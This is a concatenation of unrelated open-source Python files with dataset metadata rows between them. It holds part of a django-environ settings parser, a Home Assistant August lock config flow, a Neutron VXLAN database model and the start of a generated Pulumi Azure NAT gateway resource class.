engine=engine
)
db = db_url
def cache_url(self, var=DEFAULT_CACHE_ENV, default=NOTSET, backend=None):
"""Returns a config dictionary, defaulting to CACHE_URL.
The cache method is an alias for cache_url.
:rtype: dict
"""
return self.cache_url_config(
self.url(var, default=default),
backend=backend
)
cache = cache_url
def email_url(self, var=DEFAULT_EMAIL_ENV, default=NOTSET, backend=None):
"""Returns a config dictionary, defaulting to EMAIL_URL.
The email method is an alias for email_url.
:rtype: dict
"""
return self.email_url_config(
self.url(var, default=default),
backend=backend
)
email = email_url
def search_url(self, var=DEFAULT_SEARCH_ENV, default=NOTSET, engine=None):
"""Returns a config dictionary, defaulting to SEARCH_URL.
:rtype: dict
"""
return self.search_url_config(
self.url(var, default=default),
engine=engine
)
def path(self, var, default=NOTSET, **kwargs):
"""
:rtype: Path
"""
return Path(self.get_value(var, default=default), **kwargs)
def get_value(self, var, cast=None, default=NOTSET, parse_default=False):
"""Return value for given environment variable.
:param var: Name of variable.
:param cast: Type to cast return value as.
:param default: If var not present in environ, return this instead.
:param parse_default: force to parse default..
:returns: Value from environment or default (if set)
"""
logger.debug("get '{}' casted as '{}' with default '{}'".format(
var, cast, default
))
if var in self.scheme:
var_info = self.scheme[var]
try:
has_default = len(var_info) == 2
except TypeError:
has_default = False
if has_default:
if not cast:
cast = var_info[0]
if default is self.NOTSET:
try:
default = var_info[1]
except IndexError:
pass
else:
if not cast:
cast = var_info
try:
value = self.ENVIRON[var]
except KeyError:
if default is self.NOTSET:
error_msg = "Set the {} environment variable".format(var)
raise ImproperlyConfigured(error_msg)
value = default
# Resolve any proxied values
prefix = b'$' if isinstance(value, bytes) else '$'
escape = rb'\$' if isinstance(value, bytes) else r'\$'
if hasattr(value, 'startswith') and value.startswith(prefix):
value = value.lstrip(prefix)
value = self.get_value(value, cast=cast, default=default)
if self.escape_proxy and hasattr(value, 'replace'):
value = value.replace(escape, prefix)
# Smart casting
if self.smart_cast:
if cast is None and default is not None and \
not isinstance(default, NoValue):
cast = type(default)
value = None if default is None and value == '' else value
if value != default or (parse_default and value):
value = self.parse_value(value, cast)
return value
# Class and static methods
@classmethod
def parse_value(cls, value, cast):
"""Parse and cast provided value
:param value: Stringed value.
:param cast: Type to cast return value as.
:returns: Casted value
"""
if cast is None:
return value
elif cast is bool:
try:
value = int(value) != 0
except ValueError:
value = value.lower() in cls.BOOLEAN_TRUE_STRINGS
elif isinstance(cast, list):
value = list(map(cast[0], [x for x in value.split(',') if x]))
elif isinstance(cast, tuple):
val = value.strip('(').strip(')').split(',')
value = tuple(map(cast[0], [x for x in val if x]))
elif isinstance(cast, dict):
key_cast = cast.get('key', str)
value_cast = cast.get('value', str)
value_cast_by_key = cast.get('cast', dict())
value = dict(map(
lambda kv: (
key_cast(kv[0]),
cls.parse_value(
kv[1],
value_cast_by_key.get(kv[0], value_cast)
)
),
[val.split('=') for val in value.split(';') if val]
))
elif cast is dict:
value = dict([val.split('=') for val in value.split(',') if val])
elif cast is list:
value = [x for x in value.split(',') if x]
elif cast is tuple:
val = value.strip('(').strip(')').split(',')
value = tuple([x for x in val if x])
elif cast is float:
# clean string
float_str = re.sub(r'[^\d,.-]', '', value)
# split for avoid thousand separator and different
# locale comma/dot symbol
parts = re.split(r'[,.]', float_str)
if len(parts) == 1:
float_str = parts[0]
else:
float_str = "{}.{}".format(''.join(parts[0:-1]), parts[-1])
value = float(float_str)
else:
value = cast(value)
return value
@classmethod
def db_url_config(cls, url, engine=None):
"""Pulled from DJ-Database-URL, parse an arbitrary Database URL.
Support currently exists for PostgreSQL, PostGIS, MySQL, Oracle and
SQLite.
SQLite connects to file based databases. The same URL format is used,
omitting the hostname, and using the "file" portion as the filename of
the database. This has the effect of four slashes being present for an
absolute file path.
"""
if not isinstance(url, cls.URL_CLASS):
if url == 'sqlite://:memory:':
# this is a special case, because if we pass this URL into
# urlparse, urlparse will choke trying to interpret "memory"
# as a port number
return {
'ENGINE': cls.DB_SCHEMES['sqlite'],
'NAME': ':memory:'
}
# note: no other settings are required for sqlite
url = urlparse(url)
config = {}
# Remove query strings.
path = url.path[1:]
path = unquote_plus(path.split('?', 2)[0])
if url.scheme == 'sqlite':
if path == '':
# if we are using sqlite and we have no path, then assume we
# want an in-memory database (this is the behaviour of
# sqlalchemy)
path = ':memory:'
if url.netloc:
warnings.warn('SQLite URL contains host component %r, '
'it will be ignored' % url.netloc, stacklevel=3)
if url.scheme == 'ldap':
path = '{scheme}://{hostname}'.format(
scheme=url.scheme,
hostname=url.hostname,
)
if url.port:
path += ':{port}'.format(port=url.port)
# Update with environment configuration.
config.update({
'NAME': path or '',
'USER': _cast_urlstr(url.username) or '',
'PASSWORD': _cast_urlstr(url.password) or '',
'HOST': url.hostname or '',
'PORT': _cast_int(url.port) or '',
})
if (
url.scheme in cls.POSTGRES_FAMILY and path.startswith('/')
or cls.CLOUDSQL in path and path.startswith('/')
):
config['HOST'], config['NAME'] = path.rsplit('/', 1)
if url.scheme == 'oracle' and path == '':
config['NAME'] = config['HOST']
config['HOST'] = ''
if url.scheme == 'oracle':
# Django oracle/base.py strips port and fails on non-string value
if not config['PORT']:
del (config['PORT'])
else:
config['PORT'] = str(config['PORT'])
if url.query:
config_options = {}
for k, v in parse_qs(url.query).items():
if k.upper() in cls._DB_BASE_OPTIONS:
config.update({k.upper(): _cast(v[0])})
else:
config_options.update({k: _cast_int(v[0])})
config['OPTIONS'] = config_options
if engine:
config['ENGINE'] = engine
else:
config['ENGINE'] = url.scheme
if config['ENGINE'] in Env.DB_SCHEMES:
config['ENGINE'] = Env.DB_SCHEMES[config['ENGINE']]
if not config.get('ENGINE', False):
warnings.warn("Engine not recognized from url: {}".format(config))
return {}
return config
@classmethod
def cache_url_config(cls, url, backend=None):
"""Pulled from DJ-Cache-URL, parse an arbitrary Cache URL.
:param url:
:param backend:
:return:
"""
if not isinstance(url, cls.URL_CLASS):
if not url:
return {}
else:
url = urlparse(url)
if url.scheme not in cls.CACHE_SCHEMES:
raise ImproperlyConfigured(
'Invalid cache schema {}'.format(url.scheme)
)
location = url.netloc.split(',')
if len(location) == 1:
location = location[0]
config = {
'BACKEND': cls.CACHE_SCHEMES[url.scheme],
'LOCATION': location,
}
# Add the drive to LOCATION
if url.scheme == 'filecache':
config.update({
'LOCATION': url.netloc + url.path,
})
# urlparse('pymemcache://127.0.0.1:11211')
# => netloc='127.0.0.1:11211', path=''
#
# urlparse('pymemcache://memcached:11211/?key_prefix=ci')
# => netloc='memcached:11211', path='/'
#
# urlparse('memcache:///tmp/memcached.sock')
# => netloc='', path='/tmp/memcached.sock'
if not url.netloc and url.scheme in ['memcache', 'pymemcache']:
config.update({
'LOCATION': 'unix:' + url.path,
})
elif url.scheme.startswith('redis'):
if url.hostname:
scheme = url.scheme.replace('cache', '')
else:
scheme = 'unix'
locations = [scheme + '://' + loc + url.path
for loc in url.netloc.split(',')]
if len(locations) == 1:
config['LOCATION'] = locations[0]
else:
config['LOCATION'] = locations
if url.query:
config_options = {}
for k, v in parse_qs(url.query).items():
opt = {k.upper(): _cast(v[0])}
if k.upper() in cls._CACHE_BASE_OPTIONS:
config.update(opt)
else:
config_options.update(opt)
config['OPTIONS'] = config_options
if backend:
config['BACKEND'] = backend
return config
@classmethod
def email_url_config(cls, url, backend=None):
"""Parses an email URL."""
config = {}
url = urlparse(url) if not isinstance(url, cls.URL_CLASS) else url
# Remove query strings
path = url.path[1:]
path = unquote_plus(path.split('?', 2)[0])
# Update with environment configuration
config.update({
'EMAIL_FILE_PATH': path,
'EMAIL_HOST_USER': _cast_urlstr(url.username),
'EMAIL_HOST_PASSWORD': _cast_urlstr(url.password),
'EMAIL_HOST': url.hostname,
'EMAIL_PORT': _cast_int(url.port),
})
if backend:
config['EMAIL_BACKEND'] = backend
elif url.scheme not in cls.EMAIL_SCHEMES:
raise ImproperlyConfigured('Invalid email schema %s' % url.scheme)
elif url.scheme in cls.EMAIL_SCHEMES:
config['EMAIL_BACKEND'] = cls.EMAIL_SCHEMES[url.scheme]
if url.scheme in ('smtps', 'smtp+tls'):
config['EMAIL_USE_TLS'] = True
elif url.scheme == 'smtp+ssl':
config['EMAIL_USE_SSL'] = True
if url.query:
config_options = {}
for k, v in parse_qs(url.query).items():
opt = {k.upper(): _cast_int(v[0])}
if k.upper() in cls._EMAIL_BASE_OPTIONS:
config.update(opt)
else:
config_options.update(opt)
config['OPTIONS'] = config_options
return config
@classmethod
def search_url_config(cls, url, engine=None):
config = {}
url = urlparse(url) if not isinstance(url, cls.URL_CLASS) else url
# Remove query strings.
path = url.path[1:]
path = unquote_plus(path.split('?', 2)[0])
if url.scheme not in cls.SEARCH_SCHEMES:
raise ImproperlyConfigured(
'Invalid search schema %s' % url.scheme
)
config["ENGINE"] = cls.SEARCH_SCHEMES[url.scheme]
# check commons params
params = {} # type: dict
if url.query:
params = parse_qs(url.query)
if 'EXCLUDED_INDEXES' in params.keys():
config['EXCLUDED_INDEXES'] \
= params['EXCLUDED_INDEXES'][0].split(',')
if 'INCLUDE_SPELLING' in params.keys():
config['INCLUDE_SPELLING'] = cls.parse_value(
params['INCLUDE_SPELLING'][0],
bool
)
if 'BATCH_SIZE' in params.keys():
config['BATCH_SIZE'] = cls.parse_value(
params['BATCH_SIZE'][0],
int
)
if url.scheme == 'simple':
return config
elif url.scheme in ['solr'] + cls.ELASTICSEARCH_FAMILY:
if 'KWARGS' in params.keys():
config['KWARGS'] = params['KWARGS'][0]
# remove trailing slash
if path.endswith("/"):
path = path[:-1]
if url.scheme == 'solr':
config['URL'] = urlunparse(
('http',) + url[1:2] + (path,) + ('', '', '')
)
if 'TIMEOUT' in params.keys():
config['TIMEOUT'] = cls.parse_value(params['TIMEOUT'][0], int)
return config
if url.scheme in cls.ELASTICSEARCH_FAMILY:
split = path.rsplit("/", 1)
if len(split) > 1:
path = "/".join(split[:-1])
index = split[-1]
else:
path = ""
index = split[0]
config['URL'] = urlunparse(
('http',) + url[1:2] + (path,) + ('', '', '')
)
if 'TIMEOUT' in params.keys():
config['TIMEOUT'] = cls.parse_value(params['TIMEOUT'][0], int)
config['INDEX_NAME'] = index
return config
config['PATH'] = '/' + path
if url.scheme == 'whoosh':
if 'STORAGE' in params.keys():
config['STORAGE'] = params['STORAGE'][0]
if 'POST_LIMIT' in params.keys():
config['POST_LIMIT'] = cls.parse_value(
params['POST_LIMIT'][0],
int
)
elif url.scheme == 'xapian':
if 'FLAGS' in params.keys():
config['FLAGS'] = params['FLAGS'][0]
if engine:
config['ENGINE'] = engine
return config
@classmethod
def read_env(cls, env_file=None, overwrite=False, **overrides):
"""Read a .env file into os.environ.
If not given a path to a dotenv path, does filthy magic stack
backtracking to find the dotenv in the same directory as the file that
called read_env.
Existing environment variables take precedent and are NOT overwritten
by the file content. ``overwrite=True`` will force an overwrite of
existing environment variables.
Refs:
- https://wellfire.co/learn/easier-12-factor-django
- https://gist.github.com/bennylope/2999704
:param env_file: The path to the `.env` file your application should
use. If a path is not provided, `read_env` will attempt to import
the Django settings module from the Django project root.
:param overwrite: ``overwrite=True`` will force an overwrite of
existing environment variables.
:param **overrides: Any additional keyword arguments provided directly
to read_env will be added to the environment. If the key matches an
existing environment variable, the value will be overridden.
"""
if env_file is None:
frame = sys._getframe()
env_file = os.path.join(
os.path.dirname(frame.f_back.f_code.co_filename),
'.env'
)
if not os.path.exists(env_file):
logger.info(
"%s doesn't exist - if you're not configuring your "
"environment separately, create one." % env_file)
return
try:
if isinstance(env_file, Openable):
# Python 3.5 support (wrap path with str).
with open(str(env_file)) as f:
content = f.read()
else:
with env_file as f:
content = f.read()
except OSError:
logger.info(
"%s not found - if you're not configuring your "
"environment separately, check this." % env_file)
return
logger.debug('Read environment variables from: {}'.format(env_file))
def _keep_escaped_format_characters(match):
"""Keep escaped newline/tabs in quoted strings"""
escaped_char = match.group(1)
if escaped_char in 'rnt':
return '\\' + escaped_char
return escaped_char
for line in content.splitlines():
m1 = re.match(r'\A(?:export )?([A-Za-z_0-9]+)=(.*)\Z', line)
if m1:
key, val = m1.group(1), m1.group(2)
m2 = re.match(r"\A'(.*)'\Z", val)
if m2:
val = m2.group(1)
m3 = re.match(r'\A"(.*)"\Z', val)
if m3:
val = re.sub(r'\\(.)', _keep_escaped_format_characters,
m3.group(1))
overrides[key] = str(val)
elif not line or line.startswith('#'):
# ignore warnings for empty line-breaks or comments
pass
else:
logger.warning('Invalid line: %s', line)
def set_environ(envval):
"""Return lambda to set environ.
Use setdefault unless overwrite is specified.
"""
if overwrite:
return lambda k, v: envval.update({k: str(v)})
return lambda k, v: envval.setdefault(k, str(v))
setenv = set_environ(cls.ENVIRON)
for key, value in overrides.items():
setenv(key, value)
class FileAwareEnv(Env):
"""
First look for environment variables with ``_FILE`` appended. If found,
their contents will be read from the file system and used instead.
Use as a drop-in replacement for the standard ``environ.Env``:
.. code-block:: python
python env = environ.FileAwareEnv()
For example, if a ``SECRET_KEY_FILE`` environment variable was set,
``env("SECRET_KEY")`` would find the related variable, returning the file
contents rather than ever looking up a ``SECRET_KEY`` environment variable.
"""
ENVIRON = FileAwareMapping()
class Path:
"""Inspired to Django Two-scoops, handling File Paths in Settings."""
def path(self, *paths, **kwargs):
"""Create new Path based on self.root and provided paths.
:param paths: List of sub paths
:param kwargs: required=False
:rtype: Path
"""
return self.__class__(self.__root__, *paths, **kwargs)
def file(self, name, *args, **kwargs):
"""Open a file.
:param name: Filename appended to self.root
:param args: passed to open()
:param kwargs: passed to open()
:rtype: file
"""
return open(self(name), *args, **kwargs)
@property
def root(self):
"""Current directory for this Path"""
return self.__root__
def __init__(self, start='', *paths, **kwargs):
super().__init__()
if kwargs.get('is_file', False):
start = os.path.dirname(start)
self.__root__ = self._absolute_join(start, *paths, **kwargs)
def __call__(self, *paths, **kwargs):
"""Retrieve the absolute path, with appended paths
:param paths: List of sub path of self.root
:param kwargs: required=False
"""
return self._absolute_join(self.__root__, *paths, **kwargs)
def __eq__(self, other):
return self.__root__ == other.__root__
def __ne__(self, other):
return not self.__eq__(other)
def __add__(self, other):
if not isinstance(other, Path):
return Path(self.__root__, other)
return Path(self.__root__, other.__root__)
def __sub__(self, other):
if isinstance(other, int):
return self.path('../' * other)
elif isinstance(other, str):
if self.__root__.endswith(other):
return Path(self.__root__.rstrip(other))
raise TypeError(
"unsupported operand type(s) for -: '{self}' and '{other}' "
"unless value of {self} ends with value of {other}".format(
self=type(self), other=type(other)
)
)
def __invert__(self):
return self.path('..')
def __contains__(self, item):
base_path = self.__root__
if len(base_path) > 1:
base_path = os.path.join(base_path, '')
return item.__root__.startswith(base_path)
def __repr__(self):
return "<Path:{}>".format(self.__root__)
def __str__(self):
return self.__root__
def __unicode__(self):
return self.__str__()
def __getitem__(self, *args, **kwargs):
return self.__str__().__getitem__(*args, **kwargs)
def __fspath__(self):
return self.__str__()
def rfind(self, *args, **kwargs):
return self.__str__().rfind(*args, **kwargs)
def find(self, *args, **kwargs):
return self.__str__().find(*args, **kwargs)
@staticmethod
def _absolute_join(base, *paths, **kwargs):
absolute_path = os.path.abspath(os.path.join(base, *paths))
if kwargs.get('required', False) and not os.path.exists(absolute_path):
raise ImproperlyConfigured(
"Create required path: {}".format(absolute_path))
return absolute_path
def register_scheme(scheme):
for method in dir(urlparselib):
if method.startswith('uses_'):
getattr(urlparselib, method).append(scheme)
def register_schemes(schemes):
for scheme in schemes:
register_scheme(scheme)
# Register database and cache schemes in URLs.
register_schemes(Env.DB_SCHEMES.keys())
register_schemes(Env.CACHE_SCHEMES.keys())
register_schemes(Env.SEARCH_SCHEMES.keys())
register_schemes(Env.EMAIL_SCHEMES.keys())
| 32.498492 | 79 | 0.553377 |
acdfb1d4b63979f81b364b8022c70046325ccb0d | 4,406 | py | Python | homeassistant/components/august/config_flow.py | domwillcode/home-assistant | f170c80bea70c939c098b5c88320a1c789858958 | [
"Apache-2.0"
] | 7 | 2019-02-07T14:14:12.000Z | 2019-07-28T06:56:10.000Z | homeassistant/components/august/config_flow.py | domwillcode/home-assistant | f170c80bea70c939c098b5c88320a1c789858958 | [
"Apache-2.0"
] | 47 | 2020-07-23T07:14:33.000Z | 2022-03-31T06:01:46.000Z | homeassistant/components/august/config_flow.py | klauern/home-assistant-core | c18ba6aec0627e6afb6442c678edb5ff2bb17db6 | [
"Apache-2.0"
] | 5 | 2020-03-29T00:29:13.000Z | 2021-09-06T20:58:40.000Z | """Config flow for August integration."""
import logging
from august.authenticator import ValidationResult
import voluptuous as vol
from homeassistant import config_entries, core
from homeassistant.const import CONF_PASSWORD, CONF_TIMEOUT, CONF_USERNAME
from .const import (
CONF_LOGIN_METHOD,
DEFAULT_TIMEOUT,
LOGIN_METHODS,
VERIFICATION_CODE_KEY,
)
from .const import DOMAIN # pylint:disable=unused-import
from .exceptions import CannotConnect, InvalidAuth, RequireValidation
from .gateway import AugustGateway
_LOGGER = logging.getLogger(__name__)
DATA_SCHEMA = vol.Schema(
{
vol.Required(CONF_LOGIN_METHOD, default="phone"): vol.In(LOGIN_METHODS),
vol.Required(CONF_USERNAME): str,
vol.Required(CONF_PASSWORD): str,
vol.Optional(CONF_TIMEOUT, default=DEFAULT_TIMEOUT): vol.Coerce(int),
}
)
async def async_validate_input(
hass: core.HomeAssistant, data, august_gateway,
):
"""Validate the user input allows us to connect.
Data has the keys from DATA_SCHEMA with values provided by the user.
Request configuration steps from the user.
"""
code = data.get(VERIFICATION_CODE_KEY)
if code is not None:
result = await august_gateway.authenticator.async_validate_verification_code(
code
)
_LOGGER.debug("Verification code validation: %s", result)
if result != ValidationResult.VALIDATED:
raise RequireValidation
try:
await august_gateway.async_authenticate()
except RequireValidation:
_LOGGER.debug(
"Requesting new verification code for %s via %s",
data.get(CONF_USERNAME),
data.get(CONF_LOGIN_METHOD),
)
if code is None:
await august_gateway.authenticator.async_send_verification_code()
raise
return {
"title": data.get(CONF_USERNAME),
"data": august_gateway.config_entry(),
}
class AugustConfigFlow(config_entries.ConfigFlow, domain=DOMAIN):
"""Handle a config flow for August."""
VERSION = 1
CONNECTION_CLASS = config_entries.CONN_CLASS_CLOUD_POLL
def __init__(self):
"""Store an AugustGateway()."""
self._august_gateway = None
self.user_auth_details = {}
super().__init__()
async def async_step_user(self, user_input=None):
"""Handle the initial step."""
if self._august_gateway is None:
self._august_gateway = AugustGateway(self.hass)
errors = {}
if user_input is not None:
await self._august_gateway.async_setup(user_input)
try:
info = await async_validate_input(
self.hass, user_input, self._august_gateway,
)
await self.async_set_unique_id(user_input[CONF_USERNAME])
return self.async_create_entry(title=info["title"], data=info["data"])
except CannotConnect:
errors["base"] = "cannot_connect"
except InvalidAuth:
errors["base"] = "invalid_auth"
except RequireValidation:
self.user_auth_details = user_input
return await self.async_step_validation()
except Exception: # pylint: disable=broad-except
_LOGGER.exception("Unexpected exception")
errors["base"] = "unknown"
return self.async_show_form(
step_id="user", data_schema=DATA_SCHEMA, errors=errors
)
async def async_step_validation(self, user_input=None):
"""Handle validation (2fa) step."""
if user_input:
return await self.async_step_user({**self.user_auth_details, **user_input})
return self.async_show_form(
step_id="validation",
data_schema=vol.Schema(
{vol.Required(VERIFICATION_CODE_KEY): vol.All(str, vol.Strip)}
),
description_placeholders={
CONF_USERNAME: self.user_auth_details.get(CONF_USERNAME),
CONF_LOGIN_METHOD: self.user_auth_details.get(CONF_LOGIN_METHOD),
},
)
async def async_step_import(self, user_input):
"""Handle import."""
await self.async_set_unique_id(user_input[CONF_USERNAME])
self._abort_if_unique_id_configured()
return await self.async_step_user(user_input)
| 32.880597 | 87 | 0.650931 |
acdfb21a8627081d8d7639d95510988f06f8e6f1 | 1,716 | py | Python | neutron/db/models/plugins/ml2/vxlanallocation.py | EwaldvanGeffen/neutron | 858d7f33950a80c73501377a4b2cd36b915d0f40 | [
"Apache-2.0"
] | 1 | 2020-01-29T17:06:17.000Z | 2020-01-29T17:06:17.000Z | neutron/db/models/plugins/ml2/vxlanallocation.py | EwaldvanGeffen/neutron | 858d7f33950a80c73501377a4b2cd36b915d0f40 | [
"Apache-2.0"
] | 5 | 2019-08-14T06:46:03.000Z | 2021-12-13T20:01:25.000Z | neutron/db/models/plugins/ml2/vxlanallocation.py | EwaldvanGeffen/neutron | 858d7f33950a80c73501377a4b2cd36b915d0f40 | [
"Apache-2.0"
] | 2 | 2020-03-15T01:24:15.000Z | 2020-07-22T20:34:26.000Z | # Copyright (c) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron_lib.db import model_base
import sqlalchemy as sa
from sqlalchemy import sql
class VxlanAllocation(model_base.BASEV2):
__tablename__ = 'ml2_vxlan_allocations'
vxlan_vni = sa.Column(sa.Integer, nullable=False, primary_key=True,
autoincrement=False)
allocated = sa.Column(sa.Boolean, nullable=False, default=False,
server_default=sql.false(), index=True)
@classmethod
def get_segmentation_id(cls):
return cls.vxlan_vni
class VxlanEndpoints(model_base.BASEV2):
"""Represents tunnel endpoint in RPC mode."""
__tablename__ = 'ml2_vxlan_endpoints'
__table_args__ = (
sa.UniqueConstraint('host',
name='unique_ml2_vxlan_endpoints0host'),
model_base.BASEV2.__table_args__
)
ip_address = sa.Column(sa.String(64), primary_key=True)
udp_port = sa.Column(sa.Integer, nullable=False)
host = sa.Column(sa.String(255), nullable=True)
def __repr__(self):
return "<VxlanTunnelEndpoint(%s)>" % self.ip_address
| 34.32 | 78 | 0.694639 |
acdfb23e804a16aa263b51152773efda90eb9ad1 | 19,856 | py | Python | sdk/python/pulumi_azure_native/network/v20200701/nat_gateway.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/network/v20200701/nat_gateway.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/network/v20200701/nat_gateway.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['NatGatewayArgs', 'NatGateway']
@pulumi.input_type
class NatGatewayArgs:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
id: Optional[pulumi.Input[str]] = None,
idle_timeout_in_minutes: Optional[pulumi.Input[int]] = None,
location: Optional[pulumi.Input[str]] = None,
nat_gateway_name: Optional[pulumi.Input[str]] = None,
public_ip_addresses: Optional[pulumi.Input[Sequence[pulumi.Input['SubResourceArgs']]]] = None,
public_ip_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input['SubResourceArgs']]]] = None,
sku: Optional[pulumi.Input['NatGatewaySkuArgs']] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a NatGateway resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[str] id: Resource ID.
:param pulumi.Input[int] idle_timeout_in_minutes: The idle timeout of the nat gateway.
:param pulumi.Input[str] location: Resource location.
:param pulumi.Input[str] nat_gateway_name: The name of the nat gateway.
:param pulumi.Input[Sequence[pulumi.Input['SubResourceArgs']]] public_ip_addresses: An array of public ip addresses associated with the nat gateway resource.
:param pulumi.Input[Sequence[pulumi.Input['SubResourceArgs']]] public_ip_prefixes: An array of public ip prefixes associated with the nat gateway resource.
:param pulumi.Input['NatGatewaySkuArgs'] sku: The nat gateway SKU.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
:param pulumi.Input[Sequence[pulumi.Input[str]]] zones: A list of availability zones denoting the zone in which Nat Gateway should be deployed.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
if id is not None:
pulumi.set(__self__, "id", id)
if idle_timeout_in_minutes is not None:
pulumi.set(__self__, "idle_timeout_in_minutes", idle_timeout_in_minutes)
if location is not None:
pulumi.set(__self__, "location", location)
if nat_gateway_name is not None:
pulumi.set(__self__, "nat_gateway_name", nat_gateway_name)
if public_ip_addresses is not None:
pulumi.set(__self__, "public_ip_addresses", public_ip_addresses)
if public_ip_prefixes is not None:
pulumi.set(__self__, "public_ip_prefixes", public_ip_prefixes)
if sku is not None:
pulumi.set(__self__, "sku", sku)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if zones is not None:
pulumi.set(__self__, "zones", zones)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
Resource ID.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter(name="idleTimeoutInMinutes")
def idle_timeout_in_minutes(self) -> Optional[pulumi.Input[int]]:
"""
The idle timeout of the nat gateway.
"""
return pulumi.get(self, "idle_timeout_in_minutes")
@idle_timeout_in_minutes.setter
def idle_timeout_in_minutes(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "idle_timeout_in_minutes", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Resource location.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter(name="natGatewayName")
def nat_gateway_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the nat gateway.
"""
return pulumi.get(self, "nat_gateway_name")
@nat_gateway_name.setter
def nat_gateway_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "nat_gateway_name", value)
@property
@pulumi.getter(name="publicIpAddresses")
def public_ip_addresses(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['SubResourceArgs']]]]:
"""
An array of public ip addresses associated with the nat gateway resource.
"""
return pulumi.get(self, "public_ip_addresses")
@public_ip_addresses.setter
def public_ip_addresses(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['SubResourceArgs']]]]):
pulumi.set(self, "public_ip_addresses", value)
@property
@pulumi.getter(name="publicIpPrefixes")
def public_ip_prefixes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['SubResourceArgs']]]]:
"""
An array of public ip prefixes associated with the nat gateway resource.
"""
return pulumi.get(self, "public_ip_prefixes")
@public_ip_prefixes.setter
def public_ip_prefixes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['SubResourceArgs']]]]):
pulumi.set(self, "public_ip_prefixes", value)
@property
@pulumi.getter
def sku(self) -> Optional[pulumi.Input['NatGatewaySkuArgs']]:
"""
The nat gateway SKU.
"""
return pulumi.get(self, "sku")
@sku.setter
def sku(self, value: Optional[pulumi.Input['NatGatewaySkuArgs']]):
pulumi.set(self, "sku", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter
def zones(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of availability zones denoting the zone in which Nat Gateway should be deployed.
"""
return pulumi.get(self, "zones")
@zones.setter
def zones(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "zones", value)
class NatGateway(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
id: Optional[pulumi.Input[str]] = None,
idle_timeout_in_minutes: Optional[pulumi.Input[int]] = None,
location: Optional[pulumi.Input[str]] = None,
nat_gateway_name: Optional[pulumi.Input[str]] = None,
public_ip_addresses: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SubResourceArgs']]]]] = None,
public_ip_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SubResourceArgs']]]]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input[pulumi.InputType['NatGatewaySkuArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
"""
Nat Gateway resource.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] id: Resource ID.
:param pulumi.Input[int] idle_timeout_in_minutes: The idle timeout of the nat gateway.
:param pulumi.Input[str] location: Resource location.
:param pulumi.Input[str] nat_gateway_name: The name of the nat gateway.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SubResourceArgs']]]] public_ip_addresses: An array of public ip addresses associated with the nat gateway resource.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SubResourceArgs']]]] public_ip_prefixes: An array of public ip prefixes associated with the nat gateway resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
